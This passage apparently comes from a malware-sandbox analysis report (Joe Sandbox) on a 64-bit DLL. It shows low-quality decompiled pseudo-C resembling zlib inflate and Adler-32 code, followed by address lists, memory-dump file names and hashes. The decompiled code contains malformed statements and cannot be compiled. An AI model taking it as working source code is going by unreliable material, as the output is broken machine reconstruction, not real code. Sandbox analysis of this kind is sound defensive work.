				if (__r15 == __r15) goto 0xf3061245;
				_t979 = __r15 + 1;
				 *(_t915 + 0x30) =  *(_t915 + 0x30) | _t739 << _t501;
				 *(_t915 + 0x38) = _t816 + 8;
				_t672 = _t501 - 6;
				if (_t672 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t871 =  *((intOrPtr*)(_t915 + 0x80 + _t739 * 8)) + (_t798 & 0xffffffff);
				if (_t672 < 0) goto 0xf30613e0;
				if (_t871 + _t885 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t871 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t915 + 0x40) =  *(_t915 + 0x40) + _t569;
				r12b = 0xa;
				_t946 =  *((intOrPtr*)(_t915 + 0x58));
				_t954 =  *((intOrPtr*)(_t915 + 0x1a0));
				_t925 =  *((intOrPtr*)(_t915 + 0x70));
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t585 =  *(_t915 + 0x38);
				 *(_t915 + 0x68) =  *(_t915 + 0x3c);
				r9d =  *(_t915 + 0x44);
				_t745 = __r15 - _t979;
				r12b = 0xc;
				if (_t745 - 0xe < 0) goto 0xf3060b66;
				if (_t585 - 0x1d > 0) goto 0xf3060794;
				_t746 = _t745 << _t585;
				_t980 = _t979 + 4;
				_t504 =  *((short*)(_t946 + 0x3c + _t746 * 2));
				if (_t504 < 0) goto 0xf30607bc;
				if ((_t504 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t504 - 0x23f > 0) goto 0xf306126f;
				_t680 =  *((short*)(_t946 + 0x83c +  &(( *(_t915 + 0xe8))[_t885]) * 2));
				if (_t680 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t680 < 0) goto 0xf30608a8;
				_t396 =  *((short*)(_t946 + 0x3c + _t746 * 2));
				if (_t396 < 0) goto 0xf3060820;
				if ((_t396 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t396 - 0x23f > 0) goto 0xf306127b;
				_t398 =  *((short*)(_t946 + 0x83c + _t746 * 2));
				if (_t398 < 0) goto 0xf3060825;
				_t399 = _t398 & 0x0000ffff;
				_t685 = _t925 -  *((intOrPtr*)(_t915 + 0x1a8));
				if (_t685 >= 0) goto 0xf3061284;
				_t588 = _t585 + 0x20;
				 *((intOrPtr*)(_t954 + _t925)) = bpl;
				_t818 = _t925 + 1;
				asm("bt eax, 0x8");
				if (_t685 < 0) goto 0xf30608a3;
				_t845 =  *((intOrPtr*)(_t915 + 0x1a8));
				if (_t818 - _t845 >= 0) goto 0xf30612a2;
				 *(_t954 + _t925 + 1) = _t399;
				if (_t845 - _t925 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t927 = _t818;
				_t401 = _t399 & 0x000001ff;
				if (_t401 == 0x100) goto 0xf3060b5e;
				if (_t401 - 0x11d > 0) goto 0xf3061298;
				if (_t588 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t980 - 3 <= 0) goto 0xf306140a;
				_t981 = _t980 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t409 =  *((short*)(_t946 + 0xdda));
				if (_t409 < 0) goto 0xf3060955;
				if ((_t409 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t409 - 0x23f > 0) goto 0xf306127b;
				_t411 =  *((short*)(_t946 + 0x15da));
				if (_t411 < 0) goto 0xf306095a;
				_t591 = _t588 + 0x20 - r9d - 0xb;
				if ((_t411 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t915 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t915 + 0x118)) = _t939;
				if (r9d == 0) goto 0xf3060a01;
				if (_t591 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t981 - 3 <= 0) goto 0xf306140a;
				_t880 = ((( *(_t915 + 0x30) | _t746) >> 0x0000000a >> 0xb | __r15 - _t980 << _t588) >> r9d >> 0xb | 0xffffffff << r9d << _t591) >> r9d;
				_t593 = _t591 + 0x20 - r9d;
				 *(_t915 + 0x68) = ( !( *_t981) & _t569) +  *(_t915 + 0x68);
				r9d =  *(_t915 + 0x68);
				if (_t927 - _t939 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t915 + 0xf4)) != 0) goto 0xf30612b6;
				 *((long long*)(_t915 + 0x70)) = _t965;
				 *((long long*)(_t915 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t915 + 0x28)) =  *(_t915 + 0xb8);
				 *((long long*)(_t915 + 0x20)) = 0xf311ef68;
				_t821 = _t954;
				_t850 =  *((intOrPtr*)(_t915 + 0x1a8));
				E000007FE7FEF306148C(_t821, _t850, _t927, _t939);
				if ( *((intOrPtr*)(_t915 + 0x1a8)) - _t927 +  *((intOrPtr*)(_t915 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t915 + 0x40) = _t593;
				goto 0xf305f43b;
				_t762 =  *(_t915 + 0xb8);
				 *((long long*)(_t915 + 0x28)) = _t762;
				 *((long long*)(_t915 + 0x20)) = _t821;
				_t822 =  *((intOrPtr*)(_t915 + 0x1a0));
				_t420 = E000007FE7FEF306148C(_t822, _t850, _t821,  *((intOrPtr*)(_t915 + 0x118)));
				_t948 =  *((intOrPtr*)(_t915 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t523 = _t420;
				_t852 = _t850 << _t523 |  *(_t915 + 0x30);
				 *(_t915 + 0x30) = _t852;
				 *(_t915 + 0x38) = _t420 + 0x10;
				goto 0xf3060aee;
				_t570 =  *((short*)(_t948 + 0x3c + _t822 * 2));
				if (_t570 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t570 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t573 =  *((short*)(_t948 + 0x83c + _t880 * 2));
				if (_t573 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t915 + 0x30) = _t852 >> 0xb;
				 *(_t915 + 0x38) = _t523 - 0xb;
				 *(_t915 + 0x40) = _t573 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t915 + 0x30) = _t880;
				 *(_t915 + 0x38) = _t593;
				 *(_t915 + 0x3c) =  *(_t915 + 0x68);
				 *(_t915 + 0x40) = 0x100;
				 *(_t915 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t822 + 8)) = 0xfd;
				 *_t822 = _t762;
				 *((long long*)(_t822 + 0x10)) = _t762;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t949 =  *((intOrPtr*)(_t915 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t426 = r9b & 0xffffffff;
				if (_t426 == 0xfc) goto 0xf3060cbe;
				_t530 =  *(_t915 + 0x38);
				_t577 =  >=  ? _t426 - r15d + r14d : _t530 >> 3;
				_t429 = _t880 * 8;
				 *(_t915 + 0x38) = _t530 - _t429;
				_t888 =  &(_t981[1]);
				_t913 =  *((intOrPtr*)(_t915 + 0x1b0));
				goto 0xf3060cc0;
				_t823 =  *((intOrPtr*)(_t915 + 0x1a8));
				if ( *((intOrPtr*)(_t915 + 0x70)) != _t823) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t429 & 0xffffff00 | r12b == 0x00000017);
				_t934 = _t823;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t949 + 0x291c) = r12b;
				_t532 =  *(_t915 + 0x38);
				 *(_t949 + 8) = _t532;
				 *(_t949 + 0x24) =  *(_t915 + 0x3c);
				 *(_t949 + 0x28) =  *(_t915 + 0x40);
				 *(_t949 + 0x2c) =  *(_t915 + 0x44);
				 *_t949 =  !(0xffffffff << _t532) &  *(_t915 + 0x30);
				_t713 =  *(_t915 + 0x1b8) & 0x00000040;
				if (_t713 != 0) goto 0xf3061169;
				if (_t713 == 0) goto 0xf3061169;
				_t714 = r9b;
				if (_t714 < 0) goto 0xf3061169;
				_t802 = _t934 - _t913;
				if (_t714 < 0) goto 0xf306137a;
				 *(_t915 + 0xb8) = _t880;
				 *(_t915 + 0x6c) = r9d;
				if (_t934 -  *((intOrPtr*)(_t915 + 0x1a8)) > 0) goto 0xf3061389;
				_t433 =  *(_t949 + 0x20);
				_t957 =  *((intOrPtr*)(_t915 + 0x1a0)) + _t913;
				_t580 = _t433 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t825 = _t802 & 0xfffffffc;
				 *(_t915 + 0xf8) = _t802;
				 *(_t915 + 0x108) = _t802;
				_t771 = _t825 - 0x3f51f0dfc0;
				 *(_t915 + 0x50) = _t771;
				r12d = 0x56c0;
				 *(_t915 + 0xe8) = _t957;
				 *(_t915 + 0xd8) = _t888;
				 *(_t915 + 0x7c) = _t580;
				 *(_t915 + 0x100) = _t825;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t580 * 0x56c0;
				_t968 = _t957;
				 *(_t915 + 0x80) =  *_t968 & 0x000000ff;
				 *(_t915 + 0x84) = _t968[1] & 0x000000ff;
				 *(_t915 + 0x88) = _t968[2] & 0x000000ff;
				 *(_t915 + 0x8c) = _t968[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t915 + 0xc0 + _t949 * 4)) =  *((intOrPtr*)(_t915 + 0xc0 + _t949 * 4)) +  *((intOrPtr*)(_t915 + 0x80 + _t949 * 4));
				_t245 = _t949 + 1; // 0x1
				if (_t245 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t915 + 0xa0 + _t888 * 4)) =  *((intOrPtr*)(_t915 + 0xa0 + _t888 * 4)) +  *((intOrPtr*)(_t915 + 0x80 + _t888 * 4));
				_t255 = _t888 + 1; // 0x1
				_t718 = _t255 - 4;
				if (_t718 != 0) goto 0xf3060e4c;
				_t772 = _t771 + 0xfffffffc;
				if (_t718 != 0) goto 0xf3060dea;
				_t473 =  *(_t915 + 0xc0 + _t772 * 4);
				 *(_t915 + 0xc0 + _t772 * 4) = _t473;
				_t262 = _t772 + 1; // 0x1
				_t803 = _t262;
				_t773 = _t803;
				if (_t803 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t915 + 0xa0 + _t773 * 4)) =  *((intOrPtr*)(_t915 + 0xa0 + _t773 * 4)) - _t473 * 0xfff1;
				_t269 = _t773 + 1; // 0x1
				if (_t269 != 4) goto 0xf3060ea7;
				_t777 = _t913 * _t825 >> 0x2f;
				_t721 = 0x3f51f08900 - __r12;
				if (_t721 >= 0) goto 0xf3060de2;
				_t987 =  *(_t915 + 0x108);
				r14d = r14d & 0x00000003;
				_t937 =  *((intOrPtr*)(_t915 + 0x58));
				r10d =  *(_t915 + 0x1b8);
				_t893 =  *(_t915 + 0xe8);
				r12d =  *(_t915 + 0x7c);
				if (_t721 == 0) goto 0xf3060fc8;
				_t942 = 0x3f51f0dfc0 + _t893;
				 *(_t915 + 0x80) =  *_t942 & 0x000000ff;
				 *(_t915 + 0x84) = _t942[1] & 0x000000ff;
				 *(_t915 + 0x88) = _t942[2] & 0x000000ff;
				 *(_t915 + 0x8c) = _t942[3] & 0x000000ff;
				 *((intOrPtr*)(_t915 + 0xc0 + _t777 * 4)) =  *((intOrPtr*)(_t915 + 0xc0 + _t777 * 4)) +  *((intOrPtr*)(_t915 + 0x80 + _t777 * 4));
				_t293 = _t777 + 1; // 0x1
				_t859 = _t293;
				_t778 = _t859;
				if (_t859 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t560 =  *(_t915 + 0x80 + _t778 * 4);
				 *((intOrPtr*)(_t915 + 0xa0 + _t778 * 4)) =  *((intOrPtr*)(_t915 + 0xa0 + _t778 * 4)) + _t560;
				_t303 = _t778 + 1; // 0x1
				_t860 = _t303;
				_t779 = _t860;
				_t723 = _t860 - 4;
				if (_t723 != 0) goto 0xf3060f9f;
				if (_t723 != 0) goto 0xf3060f41;
				_t561 = _t560 * 0xfff1;
				 *((intOrPtr*)(_t915 + 0xc0 + _t779 * 4)) =  *((intOrPtr*)(_t915 + 0xc0 + _t779 * 4)) - _t561;
				_t311 = _t779 + 1; // 0x1
				_t864 = _t311;
				_t780 = _t864;
				if (_t864 != 4) goto 0xf3060fd7;
				r9d =  *(_t915 + 0x6c);
				 *((intOrPtr*)(_t915 + 0xa0 + _t780 * 4)) =  *((intOrPtr*)(_t915 + 0xa0 + _t780 * 4)) - _t561 * 0xfff1;
				_t320 = _t780 + 1; // 0x1
				_t868 = _t320;
				_t781 = _t868;
				if (_t868 != 4) goto 0xf3061019;
				 *(_t915 + 0xa0 + _t781 * 4) =  *(_t915 + 0xa0 + _t781 * 4) << 2;
				_t782 = _t781 + 1;
				if (_t782 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t915 + 0xa4)) =  *((intOrPtr*)(_t915 + 0xa4)) -  *((intOrPtr*)(_t915 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t915 + 0xa8)) =  ~( *((intOrPtr*)(_t915 + 0xc8)) +  *((intOrPtr*)(_t915 + 0xc8))) +  *((intOrPtr*)(_t915 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t915 + 0xac)) =  *((intOrPtr*)(_t915 + 0xac)) + _t868 + _t868 * 2;
				_t783 = _t782 + 1;
				if (_t783 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t915 + 0x50);
				_t785 = _t783 * _t913 >> 0x2f;
				_t786 = _t785 + 1;
				if (_t786 != 4) goto 0xf30610e4;
				if (_t987 == 0) goto 0xf306110b;
				_t542 = r12d +  *((intOrPtr*)(_t915 + 0xc0 + _t782 * 4)) + ( *(_t893 +  *(_t915 + 0x100) + _t786) & 0x000000ff);
				_t627 = (_t433 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t915 + 0xa0 + _t785 * 4)) + _t542;
				if (_t987 != _t786 + 1) goto 0xf30610fb;
				_t462 = _t627 * 0xfff1;
				_t630 = _t627 - _t462 << 0x00000010 | _t542 - _t542 * 0x0000fff1;
				 *(_t937 + 0x20) = _t630;
				_t731 = r9b;
				if (_t731 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t731 == 0) goto 0xf306117f;
				r9b = _t630 ==  *((intOrPtr*)(_t937 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t793 =  *((intOrPtr*)(_t915 + 0x110));
				 *(_t793 + 8) = r9b;
				 *_t793 =  *((intOrPtr*)(_t915 + 0xe0)) -  *(_t915 + 0xb8) + __r15 +  *(_t915 + 0xd8);
				 *((long long*)(_t793 + 0x10)) = _t937 - _t913;
				return _t462;
			}

0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
0x7fef3060424
0x7fef3060434
0x7fef3060439
0x7fef306043d
0x7fef3060445
0x7fef306044d
0x7fef3060453
0x7fef3060455
0x7fef306045b
0x7fef306045f
0x7fef3060462
0x7fef3060467
0x7fef306046d
0x7fef306047a
0x7fef3060480
0x7fef3060485
0x7fef306048b
0x7fef3060491
0x7fef30604a4
0x7fef30604a6
0x7fef30604a9
0x7fef30604ae
0x7fef30604b2
0x7fef30604b6
0x7fef30604b9
0x7fef30604d1
0x7fef30604d6
0x7fef30604da
0x7fef30604de
0x7fef30604e1
0x7fef30604f8
0x7fef30604fd
0x7fef3060506
0x7fef306050e
0x7fef3060516
0x7fef3060522
0x7fef3060526
0x7fef306052c
0x7fef3060541
0x7fef3060552
0x7fef3060560
0x7fef306056c
0x7fef3060574
0x7fef306057b
0x7fef306057f
0x7fef3060582
0x7fef3060587
0x7fef3060599
0x7fef306059d
0x7fef30605a3
0x7fef30605a9
0x7fef30605af
0x7fef30605bf
0x7fef30605c5
0x7fef30605c9
0x7fef30605ce
0x7fef30605d4
0x7fef30605de
0x7fef30605eb
0x7fef30605f0
0x7fef30605f8
0x7fef3060600
0x7fef3060605
0x7fef3060608
0x7fef3060615
0x7fef306061f
0x7fef3060624
0x7fef306062f
0x7fef3060638
0x7fef3060640
0x7fef306064b
0x7fef306064d
0x7fef3060652
0x7fef3060654
0x7fef306065c
0x7fef3060668
0x7fef306066c
0x7fef3060674
0x7fef306067a
0x7fef3060685
0x7fef306068e
0x7fef3060693
0x7fef306069c
0x7fef30606a9
0x7fef30606af
0x7fef30606b7
0x7fef30606bb
0x7fef30606c0
0x7fef30606c6
0x7fef30606cb
0x7fef30606d0
0x7fef30606d4
0x7fef30606e1
0x7fef30606ea
0x7fef30606f6
0x7fef3060702
0x7fef3060713
0x7fef306071a
0x7fef306071e
0x7fef3060721
0x7fef3060726
0x7fef306072e
0x7fef3060731
0x7fef3060736
0x7fef3060739
0x7fef306073e
0x7fef3060741
0x7fef306074b
0x7fef3060755
0x7fef306075d
0x7fef3060765
0x7fef306076d
0x7fef3060770
0x7fef3060777
0x7fef3060780
0x7fef3060787
0x7fef306078a
0x7fef306079b
0x7fef30607a3
0x7fef30607ad
0x7fef30607ba
0x7fef30607c3
0x7fef30607c7
0x7fef30607d0
0x7fef30607e1
0x7fef30607e3
0x7fef30607ef
0x7fef30607f3
0x7fef3060800
0x7fef3060808
0x7fef3060813
0x7fef306081e
0x7fef3060827
0x7fef306082b
0x7fef3060833
0x7fef3060839
0x7fef3060846
0x7fef3060848
0x7fef306084e
0x7fef3060856
0x7fef306085c
0x7fef306085e
0x7fef3060862
0x7fef3060866
0x7fef306086a
0x7fef306086c
0x7fef3060877
0x7fef306087d
0x7fef3060892
0x7fef306089e
0x7fef30608a3
0x7fef30608aa
0x7fef30608b4
0x7fef30608bf
0x7fef30608c8
0x7fef30608d4
0x7fef30608e2
0x7fef30608fc
0x7fef306090e
0x7fef3060932
0x7fef306093d
0x7fef3060948
0x7fef3060953
0x7fef306095c
0x7fef3060960
0x7fef3060968
0x7fef306096e
0x7fef306097b
0x7fef3060988
0x7fef306098d
0x7fef306099a
0x7fef30609aa
0x7fef30609b1
0x7fef30609b9
0x7fef30609be
0x7fef30609ca
0x7fef30609f3
0x7fef30609f6
0x7fef30609fd
0x7fef3060a01
0x7fef3060a09
0x7fef3060a13
0x7fef3060a19
0x7fef3060a20
0x7fef3060a30
0x7fef3060a35
0x7fef3060a3a
0x7fef3060a3d
0x7fef3060a48
0x7fef3060a83
0x7fef3060a89
0x7fef3060a8e
0x7fef3060a95
0x7fef3060a9a
0x7fef3060aa2
0x7fef3060aa7
0x7fef3060aac
0x7fef3060aaf
0x7fef3060abc
0x7fef3060ac1
0x7fef3060ac7
0x7fef3060ad0
0x7fef3060ad5
0x7fef3060ade
0x7fef3060ae6
0x7fef3060aea
0x7fef3060af6
0x7fef3060afe
0x7fef3060b0b
0x7fef3060b14
0x7fef3060b18
0x7fef3060b21
0x7fef3060b27
0x7fef3060b34
0x7fef3060b39
0x7fef3060b3e
0x7fef3060b47
0x7fef3060b4e
0x7fef3060b52
0x7fef3060b56
0x7fef3060b59
0x7fef3060b63
0x7fef3060b66
0x7fef3060b6b
0x7fef3060b73
0x7fef3060b77
0x7fef3060b7b
0x7fef3060b80
0x7fef3060b85
0x7fef3060b8b
0x7fef3060b8e
0x7fef3060b92
0x7fef3060b97
0x7fef3060b9f
0x7fef3060ba4
0x7fef3060ba8
0x7fef3060bab
0x7fef3060bae
0x7fef3060bb3
0x7fef3060bb5
0x7fef3060bb9
0x7fef3060bbc
0x7fef3060bbf
0x7fef3060bc1
0x7fef3060bc5
0x7fef3060bc8
0x7fef3060bcb
0x7fef3060bd0
0x7fef3060bd3
0x7fef3060bd8
0x7fef3060bdb
0x7fef3060bde
0x7fef3060be3
0x7fef3060be6
0x7fef3060beb
0x7fef3060bee
0x7fef3060bf1
0x7fef3060bf3
0x7fef3060bf7
0x7fef3060bfa
0x7fef3060bfd
0x7fef3060bff
0x7fef3060c03
0x7fef3060c06
0x7fef3060c09
0x7fef3060c0b
0x7fef3060c0e
0x7fef3060c19
0x7fef3060c1b
0x7fef3060c1f
0x7fef3060c22
0x7fef3060c25
0x7fef3060c27
0x7fef3060c2b
0x7fef3060c2e
0x7fef3060c47
0x7fef3060c49
0x7fef3060c52
0x7fef3060c68
0x7fef3060c73
0x7fef3060c76
0x7fef3060c7f
0x7fef3060c83
0x7fef3060c90
0x7fef3060c98
0x7fef3060c9a
0x7fef3060ca5
0x7fef3060cae
0x7fef3060cb1
0x7fef3060cb6
0x7fef3060cb9
0x7fef3060cbb
0x7fef3060cc0
0x7fef3060cc7
0x7fef3060cdd
0x7fef3060ce5
0x7fef3060ced
0x7fef3060cf5
0x7fef3060cf9
0x7fef3060cfc
0x7fef3060cff
0x7fef3060d0a
0x7fef3060d10
0x7fef3060d13
0x7fef3060d1c
0x7fef3060d1f
0x7fef3060d25
0x7fef3060d2d
0x7fef3060d3d
0x7fef3060d43
0x7fef3060d47
0x7fef3060d4a
0x7fef3060d52
0x7fef3060d55
0x7fef3060d5d
0x7fef3060d68
0x7fef3060d80
0x7fef3060d88
0x7fef3060d9d
0x7fef3060da0
0x7fef3060da5
0x7fef3060dae
0x7fef3060db6
0x7fef3060dbe
0x7fef3060dc2
0x7fef3060dca
0x7fef3060dd3
0x7fef3060de7
0x7fef3060dfe
0x7fef3060e05
0x7fef3060e0c
0x7fef3060e13
0x7fef3060e1a
0x7fef3060e25
0x7fef3060e2d
0x7fef3060e38
0x7fef3060e3a
0x7fef3060e42
0x7fef3060e53
0x7fef3060e5a
0x7fef3060e61
0x7fef3060e65
0x7fef3060e6b
0x7fef3060e6f
0x7fef3060e8f
0x7fef3060e91
0x7fef3060e98
0x7fef3060e98
0x7fef3060e9c
0x7fef3060ea3
0x7fef3060ec1
0x7fef3060ec8
0x7fef3060ed3
0x7fef3060ee9
0x7fef3060ef5
0x7fef3060ef8
0x7fef3060efe
0x7fef3060f06
0x7fef3060f1e
0x7fef3060f23
0x7fef3060f2b
0x7fef3060f33
0x7fef3060f38
0x7fef3060f3e
0x7fef3060f54
0x7fef3060f5b
0x7fef3060f62
0x7fef3060f69
0x7fef3060f79
0x7fef3060f80
0x7fef3060f80
0x7fef3060f84
0x7fef3060f8b
0x7fef3060f8d
0x7fef3060f95
0x7fef3060f9f
0x7fef3060fa6
0x7fef3060fad
0x7fef3060fad
0x7fef3060fb1
0x7fef3060fb4
0x7fef3060fb8
0x7fef3060fc2
0x7fef3060fe9
0x7fef3060ff1
0x7fef3060ff8
0x7fef3060ff8
0x7fef3060ffc
0x7fef3061003
0x7fef306100c
0x7fef3061033
0x7fef306103a
0x7fef306103a
0x7fef306103e
0x7fef3061045
0x7fef3061051
0x7fef3061059
0x7fef3061060
0x7fef306107e
0x7fef3061097
0x7fef30610a8
0x7fef30610bb
0x7fef30610c2
0x7fef30610c4
0x7fef30610d6
0x7fef30610eb
0x7fef30610f2
0x7fef30610f7
0x7fef30610ff
0x7fef3061101
0x7fef3061109
0x7fef306112c
0x7fef3061137
0x7fef3061139
0x7fef306113d
0x7fef3061140
0x7fef3061142
0x7fef3061156
0x7fef306115c
0x7fef3061160
0x7fef3061163
0x7fef3061167
0x7fef3061177
0x7fef3061188
0x7fef306118c
0x7fef306118f
0x7fef30611a6

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c03eb529d11882d1f4c9ad3dcaaea280db8cea5d93de2e606dae2b21bd5c93f
Instruction ID: d646f2b82c2367d8381f3c76817c2e2ff50ff98382c873ee4b78167857f703da
Opcode Fuzzy Hash: 5c03eb529d11882d1f4c9ad3dcaaea280db8cea5d93de2e606dae2b21bd5c93f
Instruction Fuzzy Hash: 92D1D672B0C3C58BE7A48F29E4403AAB7E6F788754F148236DA9957BD8D63DD441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3064487 Relevance: .3, Instructions: 322
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E000007FE7FEF3064487(long long __rcx, intOrPtr* __rdx, intOrPtr* __r8, void* __r9, signed int _a40, intOrPtr _a48, signed int _a56) {
				char _v360;
				void* _v616;
				intOrPtr _v640;
				char _v648;
				long long _v672;
				intOrPtr _v684;
				intOrPtr _v688;
				long long _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v712;
				signed int _v720;
				signed int _v728;
				long long _v736;
				long long _v744;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r14;
				signed int _t86;
				void* _t103;
				void* _t104;
				void* _t118;
				void* _t122;
				signed int _t123;
				unsigned long long _t127;
				void* _t128;
				void* _t132;
				long long _t143;
				signed long long _t145;
				void* _t152;
				void* _t153;
				intOrPtr _t158;
				signed long long _t183;
				signed long long _t213;
				unsigned long long _t214;
				signed long long _t216;
				signed long long _t217;
				signed long long _t219;
				void* _t220;
				void* _t221;
				signed long long _t223;
				signed long long _t224;
				signed long long _t225;
				signed long long _t226;
				void* _t227;
				void* _t231;
				void* _t256;
				signed long long _t263;
				intOrPtr* _t265;

				if ( *__rdx != 0) goto 0xf306499d;
				_t265 = __rdx;
				_v704 =  *((intOrPtr*)(__r8 + 8));
				_v712 =  *((intOrPtr*)(__r8));
				_v700 = 0x1000000;
				_v696 = _v712;
				_v688 = _v704;
				_v684 = _v700;
				_v700 = 0x2000000;
				asm("xorps xmm0, xmm0");
				asm("movaps [ecx-0x10], xmm0");
				asm("movaps [ecx-0x20], xmm0");
				r8d = 0x100;
				E000007FE7FEF30F1E10();
				r8d = 0x120;
				E000007FE7FEF30F1E10();
				if (_a40 == 0) goto 0xf30645ac;
				_t221 =  <  ? _a40 : _t220;
				_t19 = _t221 - 0x10; // 0x0
				_t122 = _t221 - 0x10;
				r8d = 0;
				_t231 =  <  ?  ~_t19 : __r8;
